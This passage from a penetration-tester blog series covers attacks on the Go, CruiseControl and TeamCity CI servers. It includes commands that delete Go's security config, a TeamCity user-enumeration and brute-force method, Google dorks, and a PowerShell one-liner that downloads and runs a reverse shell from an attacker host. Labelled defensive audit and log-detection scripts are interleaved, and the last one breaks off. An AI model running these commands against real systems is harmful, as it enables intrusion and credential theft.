<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt8Q80A8vZWQcvmkuQGR0dEjuGUs5JZSmrMd0lH8eY-ueZ78CmFUuLpPEuQAoR4yKnL6WX-xJt_ARZ4DKgVUm16WjHC17N2vcTC_XgrgV8fktUAeMXEXU5spriKoV09EtDAnm1G8rh0iU/s1600/SSH_Keys_login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt8Q80A8vZWQcvmkuQGR0dEjuGUs5JZSmrMd0lH8eY-ueZ78CmFUuLpPEuQAoR4yKnL6WX-xJt_ARZ4DKgVUm16WjHC17N2vcTC_XgrgV8fktUAeMXEXU5spriKoV09EtDAnm1G8rh0iU/s400/SSH_Keys_login.png" width="400" /></a></div>
Neat! It just depends on the kind of configuration and usage of CI tools in the target network. Source code repositories, version control systems and databases are also often accessible after compromising a CI tool.<br />
<br />
<h4>
Video Demonstration</h4>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/gdD02PYTJvg/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/gdD02PYTJvg?feature=player_embedded" width="320"></iframe></div>
<br />
Hope you enjoyed the post! Feedback and comments are welcome :)<br />
<br />
To support my research, join me for a two-day training "<b>PowerShell for Penetration Testers</b>" at:<br />
<br /></div>
<b>BlackHat, Asia (March 29-30th, 2016) </b>- <a href="https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html">https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html</a><br />
<br />
<b>HITB, Amsterdam (May 24-25th, 2016) </b>- <a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a> </div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-89589393275762410872015-12-02T20:15:00.000+05:302018-01-14T22:48:15.299+05:30Week of Continuous Intrusion tools : Day 3 - Go and CruiseControl<div dir="ltr" style="text-align: left;" trbidi="on">
Welcome to Day 3 of the Week of Continuous Intrusion Tools. We are having a look at the attack surface and abuse of Continuous Integration (CI) tools.<br />
<br />
To read the posts of the other days, refer to the list below:<br />
<br />
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson) (<a href="http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 2 - TeamCity(<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl</div>
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html">Click Here</a>)<br />
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)<br />
<div style="text-align: justify;">
<br />
Day 3 is dedicated to Go. Go is an open source CI tool. It is available <a href="http://www.go.cd/download/">here</a>. Like the previously discussed CI tools, Go supports distributed builds. That is, getting access to a Go Server provides access not only to the agents but to a good amount of source code and much more!<br />
<br />
Some of the security issues to be noticed with Go:<br />
<ul>
<li>No authentication in the default installation.</li>
<li>No protection against brute force attacks (repeated login attempts).</li>
<li>No password complexity/policy for user passwords.</li>
<li>Runs as SYSTEM or a high privilege user on Windows (most configurations settle for an admin account). </li>
</ul>
Unfortunately, there are not many public instances of Go, so it is hard to comment on the information leaked by them (see the Google Dorks section). Almost all the Go servers I pen tested were internal ones, and they regularly had no authentication at all.<br />
<br />
To be able to do something interesting at the Operating System level we must have Pipeline Group Administrator privileges (a non-admin role). I was unable to find a way to enumerate users, so some OSINT has to be used to locate developers, source code management teams and build support teams in the target enterprise (a ruthless brute force may be useless). I am not going to cover that in this post. We have to assume that we get access to a Pipeline Group Administrator user. <br />
<br />
<h4>
Executing Commands</h4>
Having the ability to add/edit jobs in a Pipeline, once again, we can execute commands at the OS level. We must configure a job which runs custom commands. <a href="http://support.thoughtworks.com/entries/22873043-go-s-custom-command">See this documentation.</a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6pTe00-JPdblG3vb7G3kWaPzPT3j-RRFr7zbOKmeFGDU9u5aZRfRhxmeu3MLwnR_N8sw04lkTlpkLdv0kFyFSzlSSPEAb4Wql6fpLrOQCWcXkntWAX7oSjpiyKCAlppRsgw345G7WlhA/s1600/Go_cmd_exec_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6pTe00-JPdblG3vb7G3kWaPzPT3j-RRFr7zbOKmeFGDU9u5aZRfRhxmeu3MLwnR_N8sw04lkTlpkLdv0kFyFSzlSSPEAb4Wql6fpLrOQCWcXkntWAX7oSjpiyKCAlppRsgw345G7WlhA/s400/Go_cmd_exec_command.png" width="400" /></a></div>
And this is how the output looks:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6QtDdPw3E47wkNXg7ms2JXg_SGmGBrUlAyCnB1Ckstx-KWPhlvXw3OdGUMFtB7qPLNw_nRAfY6ruFJ1kq34g1an7lKpm4feanG5kgRd7r8A5dQqD2vvbLAHigd3JyNxBlZmUkPMdbzE/s1600/Go_cmd_exec_console.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc6QtDdPw3E47wkNXg7ms2JXg_SGmGBrUlAyCnB1Ckstx-KWPhlvXw3OdGUMFtB7qPLNw_nRAfY6ruFJ1kq34g1an7lKpm4feanG5kgRd7r8A5dQqD2vvbLAHigd3JyNxBlZmUkPMdbzE/s400/Go_cmd_exec_console.png" width="400" /></a></div>
Nice! SYSTEM privileges yet again.<br />
<br />
Now, let's see how we can use one very useful PowerShell shell to get a reverse connection. Though Go may not be the best tool for this demo due to the lack of public instances, let's get a reverse shell using only ICMP communication. We will use <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellIcmp.ps1">Invoke-PowerShellIcmp from Nishang</a>. This reverse shell communicates completely over ICMP and needs a listener on Linux from the <a href="https://github.com/inquisb/icmpsh">icmpsh suite</a>. See my earlier blog post detailing its use <a href="http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html">here</a>. After setting up the listener, we modify Invoke-PowerShellIcmp to remove the help contents and make the function call from the script itself; then we use Invoke-Encode from Nishang to compress and base64 encode it. Now, it can be used in the custom command as below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGE0xg8LrhGUmp2DCW8MbLdVBvyEwnhOjFt5YXYFtbkMTtfDI3qWB5mkktCfP5i6Od5LLLZIgRKkfvZIob66NH1sJciptp8VM7PIv-8s51CK7HRwGoQ1lW2OL5xREqDHBMgHOXUhGyH6Y/s1600/Go_Reverse_Shell_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGE0xg8LrhGUmp2DCW8MbLdVBvyEwnhOjFt5YXYFtbkMTtfDI3qWB5mkktCfP5i6Od5LLLZIgRKkfvZIob66NH1sJciptp8VM7PIv-8s51CK7HRwGoQ1lW2OL5xREqDHBMgHOXUhGyH6Y/s400/Go_Reverse_Shell_command.png" width="400" /></a></div>
<br />
and on the listener we can see:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUUY7wnb1QLIgLZbXBm8btVTwaboiiYOhUwXsiPlEiub1DkSG7Pl_nBWVNGxoCkneIfnN3_Gd9VmILmeoJsBHxg9ePpUg2SuxxG7FW94by6zhUoUxYNNSYLSTeukGKBqIIQ0yl49N6VOU/s1600/Go_Reverse_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUUY7wnb1QLIgLZbXBm8btVTwaboiiYOhUwXsiPlEiub1DkSG7Pl_nBWVNGxoCkneIfnN3_Gd9VmILmeoJsBHxg9ePpUg2SuxxG7FW94by6zhUoUxYNNSYLSTeukGKBqIIQ0yl49N6VOU/s400/Go_Reverse_shell.png" width="400" /></a></div>
Great! We got an ICMP reverse shell!<br />
<br />
Now, if we have the ability to add/edit jobs on the master, we can execute some more interesting attacks. Here we must note that Go does not have an agent on the master by default; the agent doesn't even come in the same installation bundle. But for some reason, people just love to run an agent on the master computer. <br />
<br />
<h4>
Removing Security</h4>
If we have the ability to add/edit jobs on the master, we can remove all the security from a Go Server. We must either remove the file cruise-config.xml from the config directory in the Go installation directory, remove the &lt;security&gt; section from it, or add the current user to &lt;admins&gt; within the &lt;security&gt; section of cruise-config.xml. The Go Server service must be restarted after that. Now, anyone with the URL will have administrative rights on the Go Server.<br />
<br />
The commands below could be used to remove security from a Go Server (they delete cruise-config.xml and restart the Go Server service):<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">cmd /c powershell -c del 'C:\Program Files (x86)\Go Server\config\cruise-config.xml'
cmd /c powershell -c Restart-Service 'Go Server'
</textarea></pre>
<h4 style="text-align: left;">
Credentials storage in cleartext</h4>
<div style="text-align: justify;">
SSH keys are stored in cleartext on the disk. A user with the ability to configure jobs on the master can read the keys. The location of the SSH keys is:<br />
C:/Program Files (x86)/Go Server/%HOMEDRIVE%%HOMEPATH%/.ssh on Windows<br />
/var/go/.ssh on Linux</div>
<div style="text-align: justify;">
<br /></div>
Another interesting security issue is that Go allows file-based authentication for creating users. Read the <a href="http://www.go.cd/documentation/user/current/configuration/dev_authentication.html">documentation here</a>. The password in such a file is a base64 encoded SHA-1 with no salt. It is not hard to recover the cleartext password once we have access to that file, especially since Go doesn't enforce any password complexity. We can find out if file-based authentication is being used by looking for "passwordFile path" in cruise-config.xml.<br />
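As an added example from the defender's side (not code from the original post or from the Go project), the audit below checks a cruise-config.xml and a password file for the conditions described in the Removing Security and credentials sections: a missing &lt;security&gt; block, no declared admins, file-based authentication, unsalted base64 SHA-1 entries (which also expose users who share a password), and exec tasks that delete the config or restart the service. The sample config and password file are constructed; the nesting of &lt;security&gt; under &lt;server&gt; and the &lt;exec&gt;/&lt;arg&gt; task syntax are assumptions taken from the Go configuration schema.

```python
"""Audit a Go (GoCD) server's cruise-config.xml and its password file for the
weaknesses discussed above: no <security> block, undeclared admins, file-based
auth with unsalted SHA-1 hashes, and exec tasks that tamper with that config."""
import base64
import hashlib
import re
import xml.etree.ElementTree as ET

# Constructed sample config. Element names follow the post (security, admins,
# passwordFile path); nesting under <server> and the <exec> task syntax are
# assumed from the Go configuration schema.
SAMPLE_CONFIG = """<cruise schemaVersion="77">
  <server artifactsdir="artifacts">
    <security>
      <passwordFile path="C:\\Program Files (x86)\\Go Server\\config\\passwd" />
      <admins><user>builduser</user></admins>
    </security>
  </server>
  <pipelines group="build">
    <pipeline name="release"><stage name="package"><jobs><job name="pack"><tasks>
      <exec command="cmd">
        <arg>/c</arg>
        <arg>powershell -c del 'C:\\Program Files (x86)\\Go Server\\config\\cruise-config.xml'</arg>
      </exec>
      <exec command="cmd" args="/c powershell -c Restart-Service 'Go Server'" />
    </tasks></job></jobs></stage></pipeline>
  </pipelines>
</cruise>"""

# Build-step text that touches the server's own security settings.
TAMPER_PATTERNS = [r"cruise-config\.xml", r"Restart-Service\s+'?Go Server"]


def go_hash(password: str) -> str:
    """Unsalted base64(SHA-1), the storage format the post describes."""
    return base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


# Constructed password file: two users share a password, one entry is malformed.
SAMPLE_PASSWD = "\n".join([
    "alice:" + go_hash("Summer2015"),
    "bob:" + go_hash("Summer2015"),
    "carol:" + go_hash("correct horse battery staple"),
    "dave:not-a-hash",
])


def audit_config(xml_text: str) -> list:
    """Return human-readable findings for one cruise-config.xml."""
    findings = []
    root = ET.fromstring(xml_text)
    security = root.find(".//security")
    if security is None:
        findings.append("no <security> element: the server has no authentication")
    else:
        pwfile = security.find("passwordFile")
        if pwfile is not None:
            findings.append("file-based auth (unsalted base64 SHA-1): " + pwfile.get("path", "?"))
        admins = security.find("admins")
        if admins is None or len(admins) == 0:
            findings.append("no <admins> declared: administrative rights are not restricted")
    for task in root.iter("exec"):
        # Flatten command, legacy args attribute and <arg> children into one string.
        parts = [task.get("command", ""), task.get("args", "")]
        parts += [a.text or "" for a in task.findall("arg")]
        text = " ".join(p for p in parts if p)
        if any(re.search(p, text) for p in TAMPER_PATTERNS):
            findings.append("exec task touches server security: " + text[:70])
    return findings


def audit_password_file(text: str) -> list:
    """Check the hash format and report identical hashes: with no salt, users
    sharing a password get the same stored value."""
    findings, by_hash = [], {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        try:
            raw = base64.b64decode(digest, validate=True)
        except ValueError:
            findings.append(user + ": stored value is not valid base64")
            continue
        if len(raw) != 20:
            findings.append(user + ": %d-byte digest is not SHA-1" % len(raw))
        by_hash.setdefault(digest, []).append(user)
    for users in by_hash.values():
        if len(users) > 1:
            findings.append("shared password (no salt): " + ", ".join(users))
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG) + audit_password_file(SAMPLE_PASSWD):
        print("-", f)
```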
<br />
<h4>
CruiseControl</h4>
CruiseControl used to be very widely used, with separate forks for .Net and Ruby. You can get it from <a href="http://cruisecontrol.sourceforge.net/download.html">here</a>. We will have only a very quick look at CruiseControl as it is old software, but there are still public instances and I spot it regularly in internal pen tests. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFJ_8iKJgueY0QlppmA07Fg3kgP0vx9Pnb6OMpF53CtN9pEAgb-kmfwZsCH3cMaKF8lPXBhKYQHUHBayEiG3XWzxKw9eypp2IMZUWVPPG7_s0QvomGk1yeiaaKu-UmtM0_je3ThxVRHGA/s1600/cruisecontrol_whoami.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFJ_8iKJgueY0QlppmA07Fg3kgP0vx9Pnb6OMpF53CtN9pEAgb-kmfwZsCH3cMaKF8lPXBhKYQHUHBayEiG3XWzxKw9eypp2IMZUWVPPG7_s0QvomGk1yeiaaKu-UmtM0_je3ThxVRHGA/s400/cruisecontrol_whoami.png" width="400" /></a></div>
It has no authentication by default. Commands can be executed by adding an "exec" builder in the Schedule category. Make sure to check out /dashboard and /cruisecontrol on a CruiseControl instance.<br />
<br />
<h4>
Google Dorks</h4>
The following Google Dorks could be used to find public instances (too few) of Go:<br />
Public instances: intitle:"Go - Login" inurl:go/auth/<br />
Public instances with no authentication: intitle:"Administration - Go" inurl:/go/admin<br />
Public instances of CruiseControl: intitle:"CruiseControl - Dashboard"<br />
<br />
<h4>
The Unserialize vulnerability</h4>
A fix was released for Go on November 9th, 2015: <a href="http://www.go.cd/2015/11/09/deserialization-vulnerability-commons-collections.html">http://www.go.cd/2015/11/09/deserialization-vulnerability-commons-collections.html</a><br />
<br />
CruiseControl also uses the Commons-Collections library, but I was not interested in looking at it in detail.<br />
<div style="text-align: justify;">
<br />
<br />
To support my research, join me for a two-day training "PowerShell for Penetration Testers" at:</div>
<div style="text-align: left;">
<br />
<b>BlackHat, Asia (March 29-30th, 2016)</b> - <a href="https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html">https://www.blackhat.com/asia-16/training/powershell-for-penetration-testers.html</a></div>
<div style="text-align: justify;">
<br />
<div style="text-align: left;">
<b>HITB, Amsterdam (May 24-25th, 2016)</b> - <a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a> </div>
</div>
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com2tag:blogger.com,1999:blog-8135211063584500909.post-62213758067992800172015-12-01T20:15:00.000+05:302018-01-14T22:48:14.973+05:30Week of Continuous Intrusion Tools - Day 2 - TeamCity<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 2 of the Week of Continuous Intrusion Tools. I am doing a series of posts which explore the attack surface of CI tools.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To read the posts of the other days, refer to the list below:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson) (<a href="http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 2 - TeamCity</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html">Click Here</a>)</div>
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html">Click Here</a>)<br />
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Day 2 is dedicated to TeamCity. It can be found <a href="https://www.jetbrains.com/teamcity/download/">here</a>. Some of the security issues with TeamCity are:</div>
<ul style="text-align: left;">
<li>Registration of new users is enabled by default. A registered user gets Project Developer privileges.</li>
<li>No password complexity/policy for user passwords.</li>
<li>Runs as SYSTEM or a high privilege user on Windows (most configurations settle for an admin account). </li>
<li>Guest login could be enabled. In fact, so many public instances have it enabled. </li>
</ul>
<div style="text-align: justify;">
Also read <a href="https://confluence.jetbrains.com/pages/viewpage.action?pageId=54334889#HowTo...-TeamCitySecurityNotes">TeamCity Security Notes</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The information available on public instances of TeamCity is mind boggling! I saw web portal credentials, database credentials, hidden services, code repositories and much more on some public instances. We may not even need to compromise TeamCity to get access to an organization's intellectual property; much can be gathered from the instance itself. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But to access the Operating System and do more fun stuff we must have Project Administrator privileges (a non-admin role). This user role has the capability of adding/editing build steps.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Fortunately, TeamCity has some protection against brute force attacks. It locks a user for one minute after five consecutive wrong login attempts within a minute. Also, it sends the password in encrypted form in transit. Still, since it does not enforce any password policy on user passwords, it is possible to brute force it with reasonable success. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To enumerate users, we can either go through [TeamCityUrl]/viewLog.html?buildId=1 and iterate through it to look for the user who triggered the build, or, better, use its API and iterate through [TeamCityUrl]/app/rest/builds/id:1 looking for the "user" tag. There are generally enough manually triggered builds to enumerate a good number of users. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1qauYm93W5iylCRuWmdVBTKCxIewdXby4zx4rU4_BykmdlUOcb3cFKLQSlp69jfLUoHNK5Yehe81fObl7mIVwlms4g1vXvi8KRe5tTbzWiCTbR6P5fqY8wXkBIfDg9lfVjDTCQzGeew/s1600/teamcity_enumerate_users.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD1qauYm93W5iylCRuWmdVBTKCxIewdXby4zx4rU4_BykmdlUOcb3cFKLQSlp69jfLUoHNK5Yehe81fObl7mIVwlms4g1vXvi8KRe5tTbzWiCTbR6P5fqY8wXkBIfDg9lfVjDTCQzGeew/s400/teamcity_enumerate_users.png" width="400" /></a></div>
<div style="text-align: justify;">
After building a list of users, we can use the API to brute force credentials. The TeamCity API allows access using Basic Auth :) We can use Burp Intruder (or any other tool of choice) to launch a brute force attack against TeamCity. To use Intruder against Basic Auth see <a href="http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/">this tutorial</a>. Success looks like this:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyOObFPi_B-5Y3NpyBMDZbv1z5alqHB2kLx794g70y1_Hn8b628c4QxzbaDFXe4h6G9YZqX0vS5_VWlyDNC69KTIaqy85VGbM3qpATshhFsTFVCmphaOB7aUaelvML1p-X_Jw3qkjML68/s1600/teamcity_brute_force.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyOObFPi_B-5Y3NpyBMDZbv1z5alqHB2kLx794g70y1_Hn8b628c4QxzbaDFXe4h6G9YZqX0vS5_VWlyDNC69KTIaqy85VGbM3qpATshhFsTFVCmphaOB7aUaelvML1p-X_Jw3qkjML68/s400/teamcity_brute_force.png" width="400" /></a></div>
<div style="text-align: justify;">
Keep in mind that TeamCity blocks a user for one minute after five consecutive failed login attempts, so using a delay is advised. We should keep trying until access to a Project Administrator is achieved. </div>
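As an added example from the defender's side (not part of the original post or of TeamCity), the detector below runs over constructed access-log lines in Apache common log format and flags a source that walks /app/rest/builds/id:N to enumerate users, and one that fails Basic Auth against /app/rest at four attempts a minute, just under the five-per-minute lockout described above. The lockout is per user, so the check counts failures per source IP over a one-hour window; the log format and the attempted username appearing in the remote-user field are assumptions.

```python
"""Spot the TeamCity REST API abuse described above in web server access logs:
one source walking /app/rest/builds/id:N to enumerate users, and Basic-Auth
guessing that stays below TeamCity's five-failures-per-minute lockout. The
lockout is per user, so failures are counted per source over a longer window."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache common log format is assumed; TeamCity's own access log layout differs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
BUILD_ID_RE = re.compile(r"^/app/rest/builds/id:(\d+)")


def parse(line: str):
    """Parse one log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def analyze(lines, window=timedelta(hours=1), enum_threshold=10, fail_threshold=5):
    ids_by_ip = defaultdict(set)     # distinct build ids requested per source
    fails_by_ip = defaultdict(list)  # (timestamp, attempted user) per source
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        m = BUILD_ID_RE.match(ev["path"])
        if m:
            ids_by_ip[ev["ip"]].add(int(m.group(1)))
        if ev["path"].startswith("/app/rest") and ev["status"] == 401:
            fails_by_ip[ev["ip"]].append((ev["ts"], ev["user"]))

    findings = []
    for ip, ids in ids_by_ip.items():
        if len(ids) >= enum_threshold:
            findings.append({"type": "build-id enumeration", "ip": ip,
                             "count": len(ids), "range": (min(ids), max(ids))})
    for ip, fails in fails_by_ip.items():
        fails.sort()
        # Largest number of failures inside any span of length `window`.
        best, j = 0, 0
        for i in range(len(fails)):
            while fails[i][0] - fails[j][0] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= fail_threshold:
            gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(fails, fails[1:])]
            findings.append({"type": "REST basic-auth brute force", "ip": ip,
                             "failures": best, "users": sorted({u for _, u in fails}),
                             "min_gap_s": min(gaps) if gaps else None})
    return findings


def sample_log():
    """Constructed log lines (not real TeamCity output)."""
    ist = timezone(timedelta(hours=5, minutes=30))
    t0 = datetime(2015, 12, 1, 20, 15, 0, tzinfo=ist)
    lines = []
    for i in range(1, 13):  # walking build ids 1..12, two seconds apart
        t = (t0 + timedelta(seconds=2 * i)).strftime(TS_FMT)
        lines.append(f'10.0.0.5 - - [{t}] "GET /app/rest/builds/id:{i} HTTP/1.1" 200 1842')
    for i in range(8):  # guesses paced 15 s apart: 4 per minute, under the lockout
        t = (t0 + timedelta(minutes=1, seconds=15 * i)).strftime(TS_FMT)
        user = ("alice", "bob")[i % 2]
        lines.append(f'10.0.0.5 - {user} [{t}] "GET /app/rest/server HTTP/1.1" 401 -')
    t = t0.strftime(TS_FMT)
    lines.append(f'10.0.0.9 - carol [{t}] "GET /app/rest/builds/id:1 HTTP/1.1" 200 1842')
    return lines


if __name__ == "__main__":
    for finding in analyze(sample_log()):
        print(finding)
```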
<div style="text-align: justify;">
<br /></div>
Having the privileges to configure builds, we can do interesting stuff.<br />
<br />
<h4 style="text-align: left;">
Executing Commands</h4>
<div style="text-align: justify;">
As a Project Administrator we can add Build Steps. A Build Step with the PowerShell runner is an excellent choice on a Windows machine. (On *nix machines shell commands and scripts could be executed.)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJiX61pGFxj4l-jmjOyxOwkWFPt1uPG9TDcqq6BD7I2dJ1jGMw3E6dX-WKnjt9hWz79MhLes5xdv4XH0dy1DwJweGXhl6weQEIe3KWXaBUX060Cw9qKUFak1ziO5OC8f5KhrVJmqENX4g/s1600/TeamCity_whoami.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJiX61pGFxj4l-jmjOyxOwkWFPt1uPG9TDcqq6BD7I2dJ1jGMw3E6dX-WKnjt9hWz79MhLes5xdv4XH0dy1DwJweGXhl6weQEIe3KWXaBUX060Cw9qKUFak1ziO5OC8f5KhrVJmqENX4g/s400/TeamCity_whoami.png" width="400" /></a></div>
And when the Project is run:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrGzoGz3fYKBT92dmUt0LOSqaXcwU7t1NWwGqsit9uI07taiwXx_Ua1tckVFudrs_W26qWd2WkQaNor3css8m6OgpPQk3Cwchyphenhyphen0gUrhyphenhyphen1cUpLStVh_ztyBtHZuQC_z0cgD40zK0OFbph4/s1600/Teamcity_whoami_result.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrGzoGz3fYKBT92dmUt0LOSqaXcwU7t1NWwGqsit9uI07taiwXx_Ua1tckVFudrs_W26qWd2WkQaNor3css8m6OgpPQk3Cwchyphenhyphen0gUrhyphenhyphen1cUpLStVh_ztyBtHZuQC_z0cgD40zK0OFbph4/s320/Teamcity_whoami_result.png" width="320" /></a></div>
Sweet! We have SYSTEM privileges. <br />
<br /></div>
<div style="text-align: justify;">
Now, let's use some PowerShell hackery to improve on the above result. In a restricted environment, we may have only limited options for a connect back. Let's use <a href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PoshRatHttps.ps1">Invoke-PoshRatHttps.ps1 from Nishang</a>. Thanks to Casey, this shell makes a valid HTTPS connection between a target and a listener. Also, its client part is quite small and we just need to execute one line of PowerShell on the target. </div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object Net.WebClient).DownloadString("https://IPAddress:Port/connect")</textarea></pre>
<div style="text-align: justify;">
On the attacker's machine, just the Invoke-PoshRatHttps listener needs to be started. As soon as the build is triggered:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglt1393KlK9MswBhaSHMNmDNhzllDwHtt1DHenHuehBc7GoFvHhQI9GthTH-kCjHX40ZEU0uvZeYkkJ8GUiDYIgDTdQL2vXH9dGl4EMEYiuwWX8HBz5KtZuaxfLPD-0_e33dl17Ea8vAo/s1600/teamcity_reverse_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglt1393KlK9MswBhaSHMNmDNhzllDwHtt1DHenHuehBc7GoFvHhQI9GthTH-kCjHX40ZEU0uvZeYkkJ8GUiDYIgDTdQL2vXH9dGl4EMEYiuwWX8HBz5KtZuaxfLPD-0_e33dl17Ea8vAo/s400/teamcity_reverse_shell.png" width="400" /></a></div>
Awesome! Encrypted traffic between the attacker and the client. I don't stress using PowerShell for nothing :)<br />
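As an added example from the defender's side (not code from the original posts or from any of the CI products), this scanner checks build-step command text for the PowerShell patterns used in the Jenkins, Go and TeamCity steps of this series, decoding a -EncodedCommand payload first so that a base64-wrapped step does not slip past. The sample steps are constructed; the first two reproduce commands shown above and the third wraps the Go security-removal commands in base64.

```python
"""Scan CI build-step commands (a Jenkins batch step, a Go exec task, a TeamCity
PowerShell runner step) for the PowerShell download-and-execute patterns used
in this series, decoding -EncodedCommand payloads before matching."""
import base64
import re
from typing import Optional

# Indicators taken from the build-step commands shown in these posts.
INDICATORS = {
    "download cradle": re.compile(r"(?i)Net\.WebClient.*DownloadString"),
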